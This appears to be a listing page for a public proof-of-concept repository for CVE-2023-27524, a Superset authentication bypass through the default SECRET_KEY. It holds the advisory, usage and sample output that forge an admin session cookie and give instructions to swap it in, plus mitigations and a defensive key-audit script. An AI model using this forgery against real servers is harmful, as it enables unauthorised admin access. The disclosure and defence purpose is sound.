
CVE-2023-27524 PoC — Apache Superset: Session validation vulnerability when using provided default SECRET_KEY

Associated Vulnerability

Title: Apache Superset: Session validation vulnerability when using provided default SECRET_KEY (CVE-2023-27524)

Description: Session validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to the installation instructions allow an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value of the SECRET_KEY config. All Superset installations should always set a unique, secure, random SECRET_KEY. Your SECRET_KEY is used to securely sign all session cookies and to encrypt sensitive information in the database. Add a strong SECRET_KEY to your `superset_config.py` file like: SECRET_KEY = <YOUR_OWN_RANDOM_GENERATED_SECRET_KEY>. Alternatively you can set it with the `SUPERSET_SECRET_KEY` environment variable.
Description
A PoC for the recently disclosed CVE-2023-27524, which allows authentication bypass and access to the admin dashboard.
Readme
# CVE-2023-27524: Apache Superset Auth Bypass
Script to check whether an Apache Superset server is vulnerable to CVE-2023-27524 and, if it is, forge a session cookie with `user_id = 1` (usually the `admin` user), allowing authentication bypass and access to the dashboard. Currently, about 3000 servers world-wide run Apache Superset.


## Usage

```
usage: python3 CVE-2023-27524.py --url URL
```

## Basic Example

```
% python3 CVE-2023-27524.py --url http://10.1.221.202:8080
Got session cookie: eyJjc3JmX3Rva2VuIjoiZDBiYWI5ZmU0YTRjOWFiM2ZkMjc2YjA2ZDZiNWE0MDZmZmNkN2JkOCIsImxvY2FsZSI6ImVuIn0.ZEc0tw.X6y_rTie0yMP5oTFC6KNq8Me9ek
Decoded session cookie: {'csrf_token': 'd0bab9fe4a4c9ab3fd276b06d6b5a406ffcd7bd8', 'locale': 'en'}
Superset Version: 2.0.1
Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'
Forged session cookie for user 1: eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEc0tw.xmzJjq757QujOpk65jK0dLgCSDg
Now visit the url: `http://10.1.221.202:8080/superset/welcome` and replace the current session cookie with this `eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEc0tw.xmzJjq757QujOpk65jK0dLgCSDg` and refresh the page and we will be logged in as admin to the dashboard
```


## Mitigations
Follow the [instructions here](https://superset.apache.org/docs/installation/configuring-superset/) to generate and configure a Flask SECRET_KEY. The `superset` CLI tool can be used to [rotate the SECRET_KEY](https://superset.apache.org/docs/installation/configuring-superset/#secret_key-rotation) so that existing database connection information is preserved.
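As an added defensive example (not code from the PoC repository or from Superset), here is a small audit helper that reads a `superset_config.py` source, resolves the key Superset would actually use, and flags the shipped default shown in the output above or a key that is too short. The sample config, the 32-byte minimum and the precedence between the config file and `SUPERSET_SECRET_KEY` are assumptions:

```python
import ast
import secrets

# Default SECRET_KEY shipped with Superset 2.0.1 that the PoC above matches against.
# Extend this set with any other default your deployment history has used.
KNOWN_DEFAULT_SECRET_KEYS = {"CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET"}
MIN_KEY_BYTES = 32  # assumption: shorter keys are treated as too weak for session signing

# Constructed sample of a superset_config.py that still carries the default.
SAMPLE_CONFIG = 'ROW_LIMIT = 5000\nSECRET_KEY = "CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET"\n'


def secret_key_from_config(config_source):
    """Return the SECRET_KEY string/bytes literal assigned in superset_config.py, or None.

    Only plain literals are recognised; a computed value (e.g. read from a vault)
    comes back as None and must be checked by other means.
    """
    for node in ast.walk(ast.parse(config_source)):
        if not isinstance(node, ast.Assign):
            continue
        if any(isinstance(t, ast.Name) and t.id == "SECRET_KEY" for t in node.targets):
            if isinstance(node.value, ast.Constant) and isinstance(node.value.value, (str, bytes)):
                return node.value.value
    return None


def effective_secret_key(config_source, env):
    """Resolve the key Superset would use. Assumption: superset_config.py is imported
    after config.py, so an explicit assignment there wins over SUPERSET_SECRET_KEY."""
    return secret_key_from_config(config_source) or env.get("SUPERSET_SECRET_KEY")


def audit_secret_key(key):
    """Return a list of findings; an empty list means nothing wrong was detected."""
    if key is None:
        return ["no SECRET_KEY configured: Superset falls back to its shipped default"]
    key_bytes = key if isinstance(key, bytes) else key.encode()
    findings = []
    if key_bytes.decode("latin-1") in KNOWN_DEFAULT_SECRET_KEYS:
        findings.append("SECRET_KEY is a known default: session cookies can be forged (CVE-2023-27524)")
    if len(key_bytes) < MIN_KEY_BYTES:
        findings.append(f"SECRET_KEY is only {len(key_bytes)} bytes; use at least {MIN_KEY_BYTES}")
    return findings


def generate_secret_key():
    """Random key comparable to the `openssl rand -base64 42` the Superset docs suggest."""
    return secrets.token_urlsafe(42)
```

Run `audit_secret_key(effective_secret_key(open("superset_config.py").read(), os.environ))` against a real deployment; an empty list means the default is gone and the key has reasonable length.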


## Disclaimer
This PoC is created for educational purposes only.

## Reference
* https://github.com/horizon3ai/CVE-2023-27524
* https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/

File Snapshot

```
[4.0K] /data/pocs/42e331d575d2d9df207418a5affdcd0749e85246
├── [3.1K] CVE-2023-27524.py
├── [1.0K] LICENSE
├── [1.9K] README.md
└── [  39] requirements.txt

0 directories, 4 files
```